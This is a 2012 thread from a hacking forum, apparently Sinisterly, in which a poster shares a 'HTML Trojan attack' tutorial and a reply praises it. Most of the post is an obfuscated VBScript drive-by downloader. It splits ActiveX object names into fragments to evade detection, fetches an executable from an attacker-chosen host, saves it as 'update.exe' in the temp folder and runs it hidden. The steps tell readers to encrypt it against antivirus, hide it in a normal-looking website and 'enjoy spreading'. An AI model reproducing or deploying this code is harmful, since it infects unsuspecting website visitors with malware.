+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: Html Trojan attack (/Thread-Html-Trojan-attack)
Html Trojan attack - Savsal14 - 11-11-2012
Today I'm going to teach you an old type of attack that can be really useful with some imagination.
This method is called HTML Trojan attack.
Q: Is this detected?
Me: Yes so you will have to crypt the html code before uploading
Q: So if I have to crypt it, why not just crypt my server.exe?
Me: Because a website looks a lot more innocent than a file. Also, files get easily detected.
Q: Can I edit the code so that when he user opens it something appears like a normal website and he doesn't understand it's a virus?
Me: Yes you just need to know html or php
Steps:
1. Crypt the html file and if you want your server and upload it somewhere and get its direct link.
2. Edit the code below and instead of www.something.com/trojan.exe (don't put http now the forum adds http:// automatically)
put your virus' direct link.
3. If you want make a website and add this code later so it doesn't look suspicious.
4. You are done! Enjoy spreading!
Code:
Quote:<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.something.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>
Source: I had it from a forum that got shutdown one day so sorry I don't remember who posted it...
RE: Html Trojan attack - +Respawn - 11-11-2012
Great HQ! Nice share Savsal
